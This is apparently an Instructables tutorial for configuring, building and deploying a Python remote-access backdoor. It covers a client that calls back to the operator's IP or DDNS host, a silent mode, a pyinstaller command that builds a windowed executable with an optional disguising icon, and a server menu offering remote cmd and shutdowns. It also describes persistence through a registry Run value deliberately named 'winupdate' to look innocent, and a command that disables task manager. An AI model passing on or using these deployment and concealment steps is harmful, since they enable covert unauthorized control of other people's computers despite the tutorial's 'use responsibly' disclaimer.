Introduction: Simple Python Backdoor
So after almost a year since instructable on my Simple Netcat Backdoor, I was inspired to create a similar but more feature-filled version using the Python programming language simply because its a fairly simple language compared to others. So if you don't know what a backdoor is, its basically a way that allows you to connect to and control someone's computer. This one has many advantages over the netcat one, such as a much simpler install, usage and very easy to use outside of your network. I even included a remote cmd, so you can run any commands as before with this one. Also since the server is now cross-platform, you can now accept connections on a Linux server.
Anyway you can download the latest stable version here.
NOTE: This program is still a little bit in work in progress, I plan hopefully in the future to include a few more features. This project is also available on the github page.
Step 1: Installing Prerequisites...
So since this program is made in Python 3, you go ahead and download the latest version from here. But you will also need the following modules:
To install, simply run the installer for Pywin32. And for the other modules, you can install them by running python -m pip install "file path" as in the picture above.
So obviously you will need a windows computer to install theses modules in order to build the client.
Step 2: Setup...
So to configure the client, open up client.py with IDLE or any other editor you should see the code above.
Anyway, the first thing you need to do is configure to IP address to connect to, so set strHost to be the IP the client should connect to. Or if you plan to use the program with dns, remove the "#" on the line below and fill in your hostname in between the quotes. eg. myserver113.ddns.net.
Finally if you want ensure that the program will run in complete silent mode, remove the first "#" on line 8.
NOTE: If you plan on using the program outside of your network, you must port forward port 3000. Or if you are using a server though such as one from DigitalOcean, no port forwarding is required :).
Step 3: Build to .exe
In order to allow anyone without python and modules to run the file, you must build the file to an .exe. So to build open up a command prompt and run the following code:
pyinstaller client.py --exclude-module FixTk --exclude-module tcl --exclude-module tk --exclude-module _tkinter --exclude-module tkinter --exclude-module Tkinter --onefile --windowed
What this does is exclude the unused tkinter module to save on file size and then creates a single executable.
NOTE: You can add your own icon by adding --icon="icon path"
Step 4: Usage...
Before you can run the server, you must disable your firewall or allow port 3000 in order to accept upcoming connections. After that you can run the server to listen for connections.
Once you get a connection, you can type "--help", and you should get a prompt as in pic 1. Next you can interact with the user by typing "--i client id".
Next, you should see a menu appear as in pic 2, and now you can run any command you want such as "--m" to send a message, "--e" to open remote cmd, etc. You can also use "--b" so you can move the connection to the background and interact with another computer.
As I said, you can do anything you originally did with the netcat backdoor only more.
NOTE: Its always best to do a graceful shutdown by running "--x" in the main menu instead of closing the window.
NOTE: For using "--x 2" and "--x 3", you can also add a custom shutdown message by adding the message after the command. eg. "--x 3 Windows Shutdown".
Step 5: Uninstalling...
If you ever added this program to the startup and want to remove it, simply open up the registry and navigate to "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run". Then delete the value called "winupdate". I gave it a non-suspicious name so that it won't get deleted by accident ;).
Step 6: Explanation...
So I could spend pages writing on how I made every feature, but instead I will explain generally how this entire program works.
So the program works by first having a server listening on a port for upcoming connections from the client, in this case I chose port 3000. Next the client connects to the server using that port and then waits for the server to send it commands. In my case the commands are just simple strings of text such as "dtaskmgr" which basically tells the client to disable task manager. Its very simple actually. The server never communicates directly with the clients PC, instead it communicates with the client which then runs the commands specified.
One more thing about sending data over a socket, is that the data must be sent as bytes which means you will see the server and the client constantly decoding the messages to standard text.
Anyway, that's pretty much all that comes into making backdoor, you will notice I lightly commented out the code, so if you know a little python, it should be a little easy to understand.
Step 7: Done!
Have fun with this program! It can especially be helpful for helping in friends/relatives who do not live closely.
I hope you found this instructable useful and if you have any questions, or concerns please leave a comment or pm me.
Also if you find any bugs in this program, or feel as a feature is missing or would be useful to include, please report it to me.
Please use this program responsibly and legally, I am not responsible for anything you do.